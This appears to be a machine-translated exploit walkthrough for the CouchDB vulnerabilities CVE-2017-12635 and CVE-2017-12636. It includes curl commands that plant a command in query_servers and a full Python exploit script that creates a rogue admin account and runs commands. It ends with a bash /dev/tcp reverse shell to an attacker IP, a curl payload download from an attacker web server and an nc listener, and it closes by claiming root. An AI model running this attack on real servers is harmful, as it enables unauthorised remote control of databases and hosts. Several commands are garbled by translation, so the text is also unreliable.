Vulnerability principle:
the Apache CouchDB is an open source database, focusing on ease of use and become a "fully embrace the web database." It is a use as a storage format JSON, JavaScript as a query language, MapReduce and HTTP as NoSQL database API. A wide range of applications, such as BBC with its dynamic content display platform, market framework with Credit Suisse in its internal commodity sectors, Meebo, with its social platform (web and applications).
In November 15, 2017, CVE-2017-12635 and CVE-2017-12636 disclose, CVE-2017-12636 is an arbitrary command execution vulnerability, we can modify couchdb api configuration query_server by config, configuration items in this design, when execution view will be run.
Vulnerability reproduction:
1, the new query_server configuration, the write command to be executed;
curl -X PUT ' HTTP: // pppp: pppp drone @ ip: 5984 / _config / query_servers / cmd ' -d ' "the above mentioned id> / tmp / success " '
red arrow is to create their own account and password, I have shown below. 
2, a new temporary database and temporary table, a record is inserted;
①curl the -X-the PUT ' HTTP: // pppp: @ pppp drone IP: 5984 / OLL '
②curl the -X-the PUT ' HTTP: // pppp: @ pppp drone IP: 5984 / OLL / Vul '-d' { "the _id": "770895a97726d5ca6d70a22173005c7b"} '
red arrow points to create their own table 
3. the call processing data query_server
curl the -X-the PUT HTTP: // pppp: @ pppp drone IP: 5984 / OLL / _design / Vul -d '{ "the _id": "_ Design / Test", "views": { "wooyun": { "Map": ""}}, "Language": "cmd"} '-H "
EXP execution rebound Shell:
1. rebound script: Create an index.html in the home below. Add the following
bash -i> & /dev/tcp/172.16.11.2/9000 0> & 1
red arrow points to the native IP 
2. other from a terminal, performed in the python -m SimpleHTTPServer 8000 Home 
3. Create a exp .py script, as follows:
! # / usr / bin / env python3
Import Requests
from requests.auth Import HTTPBasicAuth
target = 'http://192.168.8.148:5984'
command = '"bash -i >& /dev/tcp/192.168.8.148/4444 0>&1"'
version = 2
session = requests.session()
session.headers = {
'Content-Type': 'application/json'
}
#session.proxies = {
#'http': 'http://127.0.0.1:8085'
#}
session.put(target + '/_users/org.couchdb.user:wooyun', data='''{
"type": "user",
"name": "wooyun",
"roles": ["_admin"],
"roles": [],
"password": "wooyun"
}''')
session.auth = HTTPBasicAuth('wooyun', 'wooyun')
if version == 1:
session.put(target + ('/_config/query_servers/cmd'), data=command)
else:
host = session.get(target + '/_membership').json()['all_nodes'][0]
session.put(target + '/_node/{}/_config/query_servers/cmd'.format(host), data=command)
session.put(target + '/wooyun')
session.put(target + '/wooyun/test', data='{"_id": "wooyuntest"}')
if version == 1:
session.post(target + '/wooyun/_temp_view?limit=10', data='{"language":"cmd","map":""}')
else:
session.put(target + '/wooyun/_design/test', data='{"_id":"_design/test","views":{"wooyun":{"map":""} },"language":"cmd"}')
4. Modify command values in exp.py: curl 172.16.11.2:8000 -o / tmp / bashell Save and Run python exp.py.
This time you can see the HTTP service listens to successfully download request
The re-open a terminal, and monitor the nc -lnvp 9000, listening on a local port 9000
6. Modify exp.py the command value bash / tmp / bashell, save and execute command python exp.py, successfully acquired bounce back Shell 
ip ip target for drone (be sure to write right, do not learn my ip wrong, worry about a day)
7. This successful. 
Get root.